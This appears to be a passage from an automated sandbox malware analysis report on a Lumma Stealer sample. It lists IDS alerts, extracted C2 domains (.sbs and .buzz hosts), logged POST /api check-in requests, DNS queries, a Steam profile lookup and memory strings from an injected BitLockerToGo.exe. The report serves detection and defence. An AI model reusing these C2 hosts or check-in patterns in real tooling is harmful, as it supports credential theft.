                    Source: Network trafficSuricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49737 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49741 -> 172.67.173.224:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.173.224:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.173.224:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 104.21.33.249:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.77.78:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.77.78:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.33.249:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49740 -> 172.67.140.193:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 172.67.140.193:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49745 -> 172.67.206.204:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.206.204:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 104.21.79.35:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49744 -> 104.102.49.254:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 104.21.79.35:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49746 -> 172.67.206.204:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.206.204:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: drawwyobstacw.sbs
                    Source: Malware configuration extractorURLs: resinedyw.sbs
                    Source: Malware configuration extractorURLs: condifendteu.sbs
                    Source: Malware configuration extractorURLs: mathcucom.sbs
                    Source: Malware configuration extractorURLs: allocatinow.sbs
                    Source: Malware configuration extractorURLs: enlargkiw.sbs
                    Source: Malware configuration extractorURLs: ehticsprocw.sbs
                    Source: Malware configuration extractorURLs: vennurviot.sbs
                    Source: Malware configuration extractorURLs: proclaimykn.buzz
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 104.21.33.249 104.21.33.249
                    Source: Joe Sandbox ViewIP Address: 172.67.173.224 172.67.173.224
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: proclaimykn.buzz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=vKrz3Hq72H1UNZmiSDnI_ARtZuyd8ck1abtebasc0mE-1728813636-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: sergei-esenin.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: eContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=d8a5315e6278e0fd2506466e; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 13 Oct 2024 10:00:35 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: proclaimykn.buzz
                    Source: global trafficDNS traffic detected: DNS query: mathcucom.sbs
                    Source: global trafficDNS traffic detected: DNS query: allocatinow.sbs
                    Source: global trafficDNS traffic detected: DNS query: enlargkiw.sbs
                    Source: global trafficDNS traffic detected: DNS query: resinedyw.sbs
                    Source: global trafficDNS traffic detected: DNS query: vennurviot.sbs
                    Source: global trafficDNS traffic detected: DNS query: ehticsprocw.sbs
                    Source: global trafficDNS traffic detected: DNS query: condifendteu.sbs
                    Source: global trafficDNS traffic detected: DNS query: drawwyobstacw.sbs
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: proclaimykn.buzz
                    Source: Setup.exeString found in binary or memory: http://.css
                    Source: Setup.exeString found in binary or memory: http://.jpg
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: Setup.exeString found in binary or memory: http://html4/loose.dtd
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/api
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/apis
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/pi
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/f
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/puN
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishc
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javY
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
